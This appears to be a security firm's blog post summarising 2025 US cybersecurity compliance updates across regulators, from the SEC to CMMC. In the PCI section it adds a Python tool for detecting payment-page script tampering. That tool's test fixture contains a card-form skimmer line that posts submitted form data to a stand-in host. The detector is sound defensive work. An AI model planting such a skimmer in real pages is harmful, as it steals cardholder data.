Regulatory bodies turn slowly, like a large ship, and that is partly by design. Their objective of protecting people stays fairly constant, but the cyber industry changes quickly, so cybersecurity compliance standards, rules, and regulations get updated more often than most.
Honestly, it is not always easy to find out exactly which cybersecurity compliance standards an organization needs to adhere to, let alone what is new each year.
SEC, FTC, FCC, NIST, HHS/OCR, FFA, FINRA, FERPA, CISA, PCI, and CMMC all have updates to their regulations that will affect organizations’ cyber efforts in 2025. Some changes were made official in 2024, and others are new in 2025.
To distill this information, we’ve compiled some cybersecurity compliance standards for the organizations we serve (or aim to)—and then gathered what’s new to pay attention to for 2025 to help you and your organization feel more prepared.
Table of Contents
The Securities and Exchange Commission (SEC)
The Securities and Exchange Commission (SEC) is a U.S. government agency responsible for enforcing federal securities (investments) laws, regulating the securities industry, and ensuring fair and efficient markets. Its mission is to protect investors, maintain fair, orderly, and efficient markets, and facilitate capital formation.
Who Needs to Comply with the SEC Regulations?
SEC regulations apply to:
- Public companies: Corporations that issue publicly traded securities.
- Broker-dealers: Firms that buy and sell securities on behalf of clients.
- Investment advisors: Professionals offering investment advice and management.
- Mutual funds and ETFs: Investment companies offering pooled investment products.
- Securities exchanges: Platforms where securities are traded.
What Cybersecurity Changes Have Been Made to the SEC Regulations for 2025?
In 2025, the SEC has introduced several key updates:
- Crypto Task Force:
- The SEC is forming a new task force to develop a comprehensive regulatory framework for crypto assets. This aims to clarify the application of existing securities laws to digital assets and establish practical disclosure frameworks.
- Notice of Exempt Solicitations:
- The SEC updated its guidance on Notices of Exempt Solicitation (Form PX14A6G), which a person owning more than $5 million of a company’s securities must file with the SEC when soliciting shareholders without seeking proxy authority. The updates clarify which voluntary submissions are permitted and what the cover page and soliciting materials must contain.
- Regulatory Freeze Pending Review:
- An executive order issued by President Trump on January 20, 2025, directed federal agencies (including the SEC) to pause all rulemaking activity for 60 days. This impacts ongoing and recently finalized regulations—including climate-related disclosure rules.
- Investment Company Names Rule:
- This is an extension of compliance dates for amendments to the Investment Company Act “Names Rule,” which addresses fund names likely to mislead investors about a fund’s investments and risks.
Additionally, the final rule amending Regulation S-P was adopted in May 2024 and published in the Federal Register on June 3, 2024. According to the SEC itself, “larger entities will have 18 months after the date of publication in the Federal Register to comply with the amendments, and smaller entities will have 24 months after the date of publication in the Federal Register to comply,” which works out to December 3, 2025 and June 3, 2026 respectively.
The requirements for this include:
- A formal incident response program
- Written policies and procedures to detect, respond to, and recover from unauthorized access to or use of customer information.
- Procedures to assess the nature and scope of an incident and to contain and control it so that further unauthorized access or use is prevented.
- Oversight of service providers, including contractual requirements that they notify the institution within 72 hours of becoming aware of a breach affecting customer information.
- Customer notification requirements
- A covered institution must notify affected individuals as soon as practicable, but not later than 30 days after becoming aware that unauthorized access to or use of customer information has occurred or is reasonably likely to have occurred.
- The notice must describe the incident, the data involved, and what affected individuals can do to protect themselves.
- Other S-P amendments
- The safeguards and disposal rules now cover “customer information” broadly, including information a covered institution receives about another financial institution’s customers.
- Covered institutions must make and maintain written records documenting compliance with the safeguards and disposal rules.
These changes reflect the SEC’s evolving priorities and regulatory approach under new leadership and administration.
More Information on SEC Regulations
The SEC’s new cybersecurity disclosure rules decoded: what they mean for investors
Federal Trade Commission (FTC)

The Federal Trade Commission (FTC) is a U.S. government agency tasked with protecting consumers and ensuring a competitive marketplace. It enforces laws against deceptive advertising, unfair business practices, and violations of consumer privacy.
Who Needs to Comply with FTC Regulations?
FTC regulations apply to a wide range of entities, including:
- Businesses and advertisers (e.g. companies promoting products or services)
- Online service providers (e.g. websites and apps collecting user data)
- Retailers (e.g. companies selling goods and services)
- Telemarketers (e.g. businesses making sales calls)
- Data brokers (e.g. companies collecting and selling consumer information)
What Cybersecurity Changes Have Been Made to FTC Regulations for 2025?
In 2025, the FTC has introduced significant updates to two key rules:
- Children’s Online Privacy Protection Act (COPPA) Rule (amendments finalized January 2025, effective June 23, 2025, with a compliance deadline of April 22, 2026):
- Opt-in Consent for Targeted Advertising: Websites and online services must obtain separate verifiable parental consent before disclosing children’s personal information to third parties for targeted advertising.
- Data Retention Limits: Operators can only retain personal information for as long as reasonably necessary to fulfill the purpose for which it was collected, and must maintain a written data retention policy.
- Written Security Program: Operators must establish, implement, and maintain a written children’s personal information security program.
- Increased Transparency: FTC-approved COPPA Safe Harbor programs must publicly disclose their membership lists and report additional information to the FTC.
- Negative Option Rule (the “click-to-cancel” rule, finalized October 2024):
- Enhanced Disclosure Requirements: Businesses must provide clear and unavoidable disclosures about recurring payments, including the amount, frequency, and cancellation mechanism.
- Express Informed Consent: Consumers must provide separate consent for the negative option feature, so they understand they are agreeing to a subscription or recurring payment.
- Simple Cancellation: The cancellation mechanism must be at least as easy to use as the method the consumer used to sign up.
- Prohibition of Misrepresentation: Businesses cannot misrepresent any material fact regarding the negative option offer or any other aspect of the offering.
These changes aim to strengthen consumer protections, particularly around children’s privacy and subscription-based services.
More Information on FTC Regulations
- FTC Finalizes Changes to Children’s Privacy Rule Limiting Companies’ Ability to Monetize Kids’ Data
- New FTC Final Rule Changes COPPA Obligations for Online Services Collecting Data from Children
Federal Communications Commission (FCC)

The Federal Communications Commission (FCC) is a U.S. government agency responsible for regulating interstate and international communications by radio, television, wire, satellite, and cable. Its mission is to ensure that the communications infrastructure is reliable, accessible, and serves the public interest.
Who Needs to Comply with FCC Regulations?
FCC regulations apply to a wide range of entities, including:
- Telecommunications companies (e.g. phone and internet service providers)
- Broadcasting organizations (e.g. TV and radio stations)
- Manufacturers of communication equipment (e.g. mobile phones, routers)
- Businesses using telemarketing (e.g. companies making robocalls or sending robotexts)
- Satellite and cable operators
What Cybersecurity Changes Have Been Made to FCC Regulations for 2025?
In 2025, the FCC’s Telephone Consumer Protection Act (TCPA) rules on consent and revocation for robocalls and robotexts changed, though not entirely as planned:
- One-to-One Consent Rule (scheduled for January 27, 2025):
- Marketers would have had to obtain prior express written consent for each individual seller, rather than one consent covering a list of “marketing partners,” and the calls or texts would have had to be logically and topically related to the website where consent was obtained.
- Caveat: on January 24, 2025 the U.S. Court of Appeals for the Eleventh Circuit vacated this rule (Insurance Marketing Coalition v. FCC) and the FCC postponed its effective date, so it is not currently in force. The pre-existing prior-express-written-consent requirement still applies.
- Consent Revocation Rule (Effective April 11, 2025):
- Consumers can revoke consent through any reasonable method, including replying “stop,” “quit,” “end,” “revoke,” “opt out,” “cancel,” or “unsubscribe” to a text, and businesses cannot designate an exclusive means of revocation.
- Marketers must honor a revocation request within 10 business days.
- A single confirmation text acknowledging the opt-out is permitted, provided it contains no marketing content.
These changes aim to give consumers greater control over their communications preferences and ensure businesses adhere to stricter consent and revocation practices.
More Information about the FCC Regulations
CPNI, Privacy, Cyber Security, and TCPA Update
National Institute of Standards and Technology (NIST)
The National Institute of Standards and Technology (NIST) is a U.S. government agency under the Department of Commerce. Founded in 1901, its mission is to promote innovation, industrial competitiveness, and technological advancements. NIST is a leader in cybersecurity through its Cybersecurity Framework (CSF), providing universal guidelines that organizations can adapt for risk management and IT security.
Who Needs to Comply with NIST Standards?
NIST publishes standards and guidelines rather than regulations; the obligation to follow them comes from other laws and contracts. They are widely adopted by:
- Federal agencies: Mandated to follow NIST standards (FIPS and the SP 800 series) under the Federal Information Security Modernization Act (FISMA).
- Private sector organizations: Including healthcare, financial services, and technology companies, which use NIST standards to strengthen cybersecurity and meet other compliance requirements.
- Defense contractors: Required to implement NIST SP 800-171 under DFARS clause 252.204-7012, and under CMMC.
What Cybersecurity Changes Have Been Made to NIST Publications for 2025?
Recent NIST publications that organizations should track in 2025:
- Cybersecurity Framework (CSF) 2.0 (published February 2024):
- Govern Function: A sixth core function, Govern, covers strategy, roles and responsibilities, policy, and oversight, and ties cybersecurity into enterprise risk management.
- Broader Scope: CSF 2.0 is written for all organizations, not only critical infrastructure, and gives more weight to supply chain risk management.
- Guidelines for API Protection:
- NIST SP 800-228 (draft, 2025): Guidelines for API protection for cloud-native systems.
- Adversarial Machine Learning:
- NIST AI 100-2 E2025: A taxonomy and terminology for attacks and mitigations in adversarial machine learning.
- 5G Cybersecurity:
- NIST SP 1800-33 (draft): A practice guide for securing 5G networks.
These updates reflect the growing complexity of cyber threats, advancements in technology, and the need for organizations to adapt.
NIST CSF 2.0 has now been out for long enough that organizations will soon be expected to update their programs to align with the updates.
More Information About the NIST CSF 2.0 Regulations
Department of Health & Human Services (HHS)/Office for Civil Rights (OCR)

The Office for Civil Rights (OCR) is part of the U.S. Department of Health and Human Services (HHS). It enforces laws that protect individuals’ health information privacy and security, primarily through the Health Insurance Portability and Accountability Act (HIPAA).
The Department of Health and Human Services (HHS) has established Cybersecurity Performance Goals to protect the healthcare sector from cyber threats and ensure the security of sensitive health information. These goals are part of a broader effort to enhance the resilience and reliability of healthcare infrastructure.
Who Needs to Comply with HHS Cybersecurity Requirements?
The HIPAA Security Rule, which OCR enforces, applies to:
- Covered entities: Health plans, healthcare clearinghouses, and healthcare providers that transmit health information electronically in connection with standard transactions.
- Business associates: Entities that perform services for covered entities involving the use or disclosure of protected health information (PHI), and their subcontractors.
The Cybersecurity Performance Goals target the same organizations, along with federal agencies that operate healthcare-related information systems.
Cybersecurity Performance Goals are currently voluntary but widely expected to become requirements in the future. We covered those extensively in a prior blog post (https://frsecure.com/blog/hhs-cybersecurity-performance-goals-checklists/)
HHS also issued a notice of proposed rulemaking (NPRM) in late December 2024, published in the Federal Register on January 6, 2025, to update the HIPAA Security Rule (https://www.hhs.gov/hipaa/for-professionals/security/hipaa-security-rule-nprm/factsheet/index.html)
What Cybersecurity Changes Have Been Made to OCR & HHS Regulations for 2025?
In 2025, HHS has proposed significant updates to the HIPAA Security Rule to strengthen cybersecurity protections for electronic protected health information (ePHI). These remain proposals until a final rule is issued, but they signal what OCR expects:
- Removal of Distinction:
- The distinction between “required” and “addressable” implementation specifications would be removed, making all specifications required with specific, limited exceptions.
- Documentation Requirements:
- Written documentation of all Security Rule policies, procedures, plans, and analyses would be required.
- Technology Asset Inventory:
- Regulated entities would have to develop and maintain a technology asset inventory and a network map illustrating the movement of ePHI through their electronic information systems, updated at least every 12 months and after relevant changes.
- Risk Analysis Specificity:
- Greater specificity would be required for conducting risk analyses, including reviewing the asset inventory and network map and identifying reasonably anticipated threats and vulnerabilities for each system.
- Specific Technical Controls:
- Multi-factor authentication, encryption of ePHI at rest and in transit, network segmentation, vulnerability scanning at least every six months, penetration testing at least annually, the ability to restore critical systems within 72 hours, and a compliance audit at least every 12 months.
These changes aim to address the increasing cybersecurity threats to the healthcare sector and ensure more robust protection of sensitive health information.
More Information About the HHS Cybersecurity Performance Goals:
HPH Cybersecurity Performance Goals
Federal Financial Authority (FFA)
The “Federal Financial Authority” is not a single U.S. agency; the label is used here as shorthand for the federal regulators of financial institutions and markets (for example, the FFIEC member agencies), which enforce laws related to banking, securities, insurance, and other financial services to ensure stability, transparency, and consumer protection.
Who Needs to Comply with FFA Regulations?
FFA regulations apply to:
- Banks and credit unions: Institutions offering deposit accounts and loans.
- Securities firms: Companies involved in trading stocks, bonds, and other securities.
- Insurance companies: Providers of various insurance products.
- Investment advisors: Professionals offering investment advice and management.
- Payment processors: Entities handling electronic transactions.
What Cybersecurity Changes Have Been Made to the FFA Regulations for 2025?
For 2025, the themes across these regulators are:
- Enhanced Consumer Protection Measures:
- Stricter disclosure requirements for financial products, so consumers receive clear and comprehensive information.
- Stronger fraud detection expectations to protect consumers from identity theft and financial scams.
- Cybersecurity Standards:
- Regular cybersecurity risk assessments for regulated entities to identify and mitigate risks.
- Encryption of sensitive financial data at rest and in transit.
These changes aim to enhance consumer protection and mitigate risks.
More Information About FFA Regulations
Cybersecurity in 2025: What Financial Institutions Need to Know
Financial Industry Regulatory Authority (FINRA)

The Financial Industry Regulatory Authority (FINRA) is a self-regulatory organization (SRO), overseen by the SEC, that regulates member broker-dealer firms and exchange markets. Its mission is to protect investors and ensure market integrity through effective and efficient regulation.
Who Needs to Comply with FINRA Regulations?
FINRA rules apply to:
- Broker-dealers: Member firms that buy and sell securities on behalf of clients.
- Registered representatives: Individuals associated with member firms who are licensed to trade securities.
- Market makers: Firms that provide liquidity by standing ready to buy and sell securities.
(Investment advisers are regulated by the SEC or state regulators rather than FINRA, unless they are also registered as broker-dealers.)
What Cybersecurity Changes Have Been Made to FINRA Regulations for 2025?
FINRA’s 2025 Annual Regulatory Oversight Report does not create new rules, but it sets out where examinations will focus:
- Third-Party Risk Landscape:
- Closer scrutiny of how firms oversee third-party service providers, particularly for outsourced critical functions and in the wake of vendor incidents.
- Cybersecurity and Cyber-Enabled Fraud:
- Observations on evolving threats, including account takeover, imposter websites, and fraud against customer accounts, with the controls FINRA expects to see for each.
- Artificial Intelligence (AI):
- Observations on firms’ use of generative AI, with the reminder that existing FINRA rules are technology-neutral and apply to AI-assisted activity.
- Investment Fraud:
- Increased focus on identifying and preventing investment fraud targeting retail investors.
- Remote Inspections Pilot Program:
- The remote inspections pilot program and residential supervisory location rules, which let eligible firms conduct certain inspections remotely.
These changes aim to strengthen the regulatory framework, enhance investor protections, and adapt to technological advancements in the financial industry.
More Information on FINRA Regulations
2025 FINRA Annual Regulatory Oversight Report
Family Educational Rights and Privacy Act (FERPA)
The Family Educational Rights and Privacy Act (FERPA) is a U.S. federal law that protects the privacy of student education records. It grants parents certain rights regarding their children’s education records, which transfer to the student when they turn 18 or attend a school beyond the high school level.
Who Needs to Comply with FERPA Regulations?
FERPA regulations apply to:
- Educational institutions: Schools, colleges, and universities that receive federal funding.
- School officials: Teachers, administrators, and other staff with access to student records.
- Third-party service providers: Companies that handle student data on behalf of educational institutions.
What Cybersecurity Changes Have Been Made to FERPA Regulations for 2025?
The 2025 developments around FERPA are mostly about enforcement emphasis and Department of Education guidance rather than new statutory text. Areas to watch:
- Enhanced Parental Rights:
- Schools must allow parents to inspect and review their student’s education records, including records related to a student’s gender identity, a point the Department of Education reminded schools of in 2025.
- Schools must provide annual notification to parents and eligible students of their rights under FERPA.
- Data Security Expectations:
- Educational institutions are expected to protect student records with reasonable security measures and to limit access to school officials with a legitimate educational interest.
- Schools must keep a record of each disclosure of education records to outside parties, which FERPA already requires, and should log internal access as well.
- Transparency and Accountability:
- Schools should disclose their data privacy practices and the third-party agreements under which vendors handle student data on the school’s behalf.
- FERPA itself sets no breach notification deadline, so the timing for notifying affected individuals is usually driven by state breach laws and contract terms; institutions should still notify promptly.
These changes aim to strengthen the protection of student privacy and ensure greater transparency and accountability in handling student data.
More Information on FERPA Regulations
FERPA Compliance Guide (Updated 2025)
Cybersecurity and Infrastructure Security Agency (CISA)

The Cybersecurity and Infrastructure Security Agency (CISA) is a U.S. government agency responsible for enhancing the security, resilience, and reliability of the nation’s cybersecurity and infrastructure. CISA works to protect against cyber threats and ensure the security of critical infrastructure sectors.
Who Needs to Comply with CISA Regulations?
CISA regulations apply to:
- Federal agencies: Government entities that manage critical infrastructure and information systems.
- Critical infrastructure sectors: Industries such as energy, healthcare, financial services, transportation, and communications.
- Private sector organizations: Companies that operate within critical infrastructure sectors and handle sensitive data.
What Cybersecurity Changes Have Been Made to CISA Regulations for 2025?
In 2025, the CISA items to track are:
- Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA):
- Status: CISA published the proposed rule in April 2024; reporting becomes mandatory only when the final rule takes effect, so 2025 is the time to build the process.
- Reporting Requirements: Covered entities must report substantial cyber incidents within 72 hours of reasonably believing one has occurred, and ransom payments within 24 hours of making them, and must preserve data relevant to the incident.
- Scope of Coverage: The proposed rule applies broadly to entities in a critical infrastructure sector that exceed the small business size standard or meet sector-specific criteria.
- Binding Operational Directive (BOD) 25-01 (issued December 2024):
- Secure Cloud Practices: Federal civilian agencies must implement CISA’s Secure Cloud Business Applications (SCuBA) secure configuration baselines, starting with Microsoft 365.
- Continuous Monitoring: Agencies must inventory their cloud tenants, deploy CISA’s automated configuration assessment tools, and integrate them with CISA’s continuous monitoring infrastructure.
These changes aim to enhance the security of critical infrastructure and federal information systems, ensuring robust protection against evolving cyber threats.
More Information on CISA Requirements:
- Navigating Profound Change: CISA Announces Proposed Rule for Mandated Cyber Incident Reporting
- BOD 25-01: Implementation Guidance for Implementing Secure Practices for Cloud Services
Payment Card Industry (PCI)
Payment Card Industry (PCI) compliance refers to a set of security standards designed to ensure that all companies that process, store, or transmit credit card information maintain a secure environment. These standards are developed and managed by the PCI Security Standards Council (PCI SSC), which was founded by major credit card companies like Visa, MasterCard, American Express, Discover, and JCB.
Who Needs to Comply with PCI?
Compliance with PCI standards is required for:
- Merchants: Any business that accepts credit card payments, whether online, in-store, or over the phone.
- Payment processors: Companies that handle transactions between merchants and banks.
- Service providers: Entities that store, process, or transmit cardholder data on behalf of merchants.
- Financial institutions: Banks and other entities involved in issuing credit cards.
What Changes Have Been Made to PCI Regulations for 2025?
PCI DSS v4.0 was released in March 2022 (the current text is v4.0.1, June 2024) and fully replaced v3.2.1 on March 31, 2024. Its 51 future-dated requirements, treated as best practice until then, became mandatory on March 31, 2025. Key ones include:
- Targeted Risk Analysis (TRA): Requirement 12.3.1 requires a documented TRA for each requirement that lets the entity set its own control frequency, so “how often” must be justified rather than assumed.
- Multi-Factor Authentication (MFA): Requirement 8.4.2 makes MFA mandatory for all access into the cardholder data environment, not only administrative and remote access.
- Automated Controls: Requirement 10.4.1.1 requires automated mechanisms for reviewing audit logs, and 5.3.3 requires anti-malware to scan removable media automatically when it is inserted or connected.
- Change Detection on Payment Pages: Requirement 6.4.3 requires an inventory of all scripts on payment pages, with each script authorized and its integrity assured; 11.6.1 requires a change- and tamper-detection mechanism that alerts on unauthorized modification to the HTTP headers and script contents of payment pages as received by the browser, evaluated at least once every seven days or at the frequency set by the TRA.
- Stronger Authentication Hygiene: Requirement 8.3.6 raises the minimum password length to 12 characters.
These updates aim to strengthen the security of payment card transactions and protect against increasingly sophisticated cyber threats.
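Requirements 6.4.3 and 11.6.1 are the ones most teams end up building tooling for, so here is a minimal implementation as an added example (not from the original post or from the PCI SSC): it inventories the scripts on a payment page, records an approved baseline (each external script URL with its Subresource Integrity hash, and the SHA-256 of each inline block), and on each later fetch reports additions, removals, integrity mismatches and a weakened Content-Security-Policy header. The domains, the SRI digest and the page snippets are constructed for the demonstration; in production the HTML and headers would come from an HTTP fetch of the live page and the check would run at least every seven days as 11.6.1 requires.

```python
"""PCI DSS v4.0 req. 6.4.3 / 11.6.1 style payment-page script inventory and tamper detection.
Added example; all URLs, digests and page snippets below are constructed."""
from __future__ import annotations
import hashlib
import re
from dataclasses import dataclass
from html.parser import HTMLParser


@dataclass(frozen=True)
class Script:
    src: str | None        # external URL, or None for an inline block
    sha256: str            # SHA-256 of the inline body ("" for external scripts)
    integrity: str | None  # SRI attribute as served, if any


class _ScriptCollector(HTMLParser):
    """Collects every <script> element; HTMLParser hands script bodies over verbatim."""
    def __init__(self) -> None:
        super().__init__()
        self.scripts: list[Script] = []
        self._attrs: dict[str, str] | None = None
        self._body: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs, self._body = {k: (v or "") for k, v in attrs}, []

    def handle_data(self, data):
        if self._attrs is not None:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            src = self._attrs.get("src")
            body = "".join(self._body).strip()
            digest = hashlib.sha256(body.encode()).hexdigest() if src is None else ""
            self.scripts.append(Script(src, digest, self._attrs.get("integrity")))
            self._attrs = None


def inventory(html: str) -> list[Script]:
    """All scripts on the page in document order (the 6.4.3 inventory)."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def build_baseline(approved_html: str) -> dict:
    """Record authorized scripts from a reviewed snapshot: src -> SRI hash, plus inline hashes."""
    baseline: dict = {"external": {}, "inline": set()}
    for s in inventory(approved_html):
        if s.src is not None:
            baseline["external"][s.src] = s.integrity
        else:
            baseline["inline"].add(s.sha256)
    return baseline


def check_payment_page(baseline: dict, html: str, headers: dict[str, str]) -> list[str]:
    """Diff a fresh fetch against the baseline; an empty list means nothing changed."""
    findings: list[str] = []
    seen: set[str] = set()
    for s in inventory(html):
        if s.src is None:
            if s.sha256 not in baseline["inline"]:
                findings.append(f"inline script not in baseline (sha256 {s.sha256[:16]})")
            continue
        seen.add(s.src)
        if s.src not in baseline["external"]:
            findings.append(f"unauthorized external script: {s.src}")
        elif s.integrity is None:
            findings.append(f"external script served without integrity attribute: {s.src}")
        elif s.integrity != baseline["external"][s.src]:
            findings.append(f"SRI integrity mismatch for {s.src}")
    for src in baseline["external"]:
        if src not in seen:
            findings.append(f"authorized script missing from page: {src}")
    # 11.6.1 also covers security-impacting HTTP headers; CSP is the one to watch.
    csp = {k.lower(): v for k, v in headers.items()}.get("content-security-policy")
    if csp is None:
        findings.append("Content-Security-Policy header missing")
    elif re.search(r"script-src[^;]*'unsafe-inline'", csp):
        findings.append("CSP script-src permits 'unsafe-inline'")
    return findings


# Constructed snapshots: the approved page loads the PSP's checkout script with SRI plus a
# nonce-protected inline config; the tampered copy appends a form skimmer and an extra script.
APPROVED_PAGE = """<html><head>
<script src="https://js.psp.example/v3/checkout.js"
        integrity="sha384-constructedDigestOfCheckoutJs" crossorigin="anonymous"></script>
<script nonce="r4nd0m">
  window.__cfg = {merchant: "m_12345", form: "#card-form"};
</script>
</head><body><form id="card-form"></form></body></html>"""
TAMPERED_PAGE = APPROVED_PAGE.replace(
    'form: "#card-form"};',
    'form: "#card-form"};\n  document.addEventListener("submit", e => '
    'fetch("https://stats-cdn.example/c", {method: "POST", body: new FormData(e.target)}));',
).replace("</body>", '<script src="https://stats-cdn.example/a.js"></script></body>')
GOOD_HEADERS = {"Content-Security-Policy": "default-src 'self'; script-src 'self' https://js.psp.example 'nonce-r4nd0m'"}
BAD_HEADERS = {"Content-Security-Policy": "default-src *; script-src * 'unsafe-inline'"}
FINDINGS = check_payment_page(build_baseline(APPROVED_PAGE), TAMPERED_PAGE, BAD_HEADERS)
```

Run against the approved snapshot with the good headers the check returns no findings; against the tampered copy it reports the altered inline block, the unreviewed `a.js`, and the permissive CSP. A script in the approved snapshot that carries no integrity attribute is reported on every run; that is intentional, since 6.4.3 asks for a method to assure each script’s integrity, and the finding clears once SRI or an equivalent control is in place. Treat a finding as an alert to investigate rather than proof of compromise: a legitimate deploy also changes hashes, which is why the baseline is rebuilt from a reviewed snapshot after each authorized change.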
More Information on PCI Standards
Cybersecurity Maturity Model Certification (CMMC)

The Cybersecurity Maturity Model Certification (CMMC) is a framework developed by the U.S. Department of Defense (DoD) to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB). It aims to ensure that contractors handling sensitive federal information, such as Controlled Unclassified Information (CUI), meet specific cybersecurity standards.
Who Needs to Comply with CMMC Regulations?
CMMC regulations apply to:
- Defense contractors: Companies that provide goods and services to the DoD.
- Subcontractors: Entities working with prime contractors on DoD contracts.
- Suppliers: Organizations within the supply chain that handle CUI.
What Changes Have Been Made to CMMC Requirements for 2025?
The CMMC Program final rule (32 CFR Part 170) was published in October 2024 and took effect on December 16, 2024; the companion acquisition rule that puts CMMC requirements into DoD contracts is expected to follow in 2025 with a phased rollout. The program now looks like this:
- Streamlined Maturity Levels:
- Level 1 (Foundational): The basic safeguarding requirements of FAR 52.204-21 for Federal Contract Information (FCI).
- Level 2 (Advanced): The 110 security requirements of NIST SP 800-171 for protecting Controlled Unclassified Information (CUI).
- Level 3 (Expert): Level 2 plus selected requirements from NIST SP 800-172, for programs handling the highest-priority CUI.
- Assessment Types:
- Self-Assessments: An annual self-assessment with an affirmation in SPRS for Level 1, and for Level 2 where the contract allows it.
- Third-Party Assessments: A certified third-party assessment organization (C3PAO) assessment every three years for Level 2 where the contract requires it.
- Government-Led Assessments: A DoD (DIBCAC) assessment every three years for Level 3.
- Plans of Action and Milestones (POA&Ms):
- Contractors can obtain a conditional Level 2 or Level 3 status with a POA&M for certain lower-weighted requirements, provided the minimum score is met (88 of 110 for Level 2). POA&M items must be closed within 180 days or the conditional status lapses, and POA&Ms are not permitted at Level 1.
These changes aim to simplify compliance while maintaining robust security requirements, ensuring that defense contractors can effectively protect sensitive information.
More Information on CMMC Requirements
2025 Cybersecurity Compliance Standards Takeaways and Advice
So, what does this mean for organizations?
Well, the reality is that if you already have a solid security program, most of this is updating documentation to align with changes in the language of these cybersecurity compliance standards. If you are not already meeting the requirements, it goes back to the basics.
We like to say that if you do security correctly, you will get to compliance—but being compliant doesn’t mean you are secure.
That still holds true for all these changes. Build your program properly and you will be in a good position to meet any required cybersecurity compliance standards.
The overarching theme is more accountability for third-party risk management. It will no longer be defensible NOT to have a plan to assess the risks your suppliers present to you.
Work with an expert who can help you navigate what the cybersecurity compliance standards are looking for. Don’t try to reinvent the wheel. We have a plethora of resources on our site that can help you from policy templates to an IR plan and playbooks, and if you need further assistance with any of these regulations, don’t hesitate to reach out.
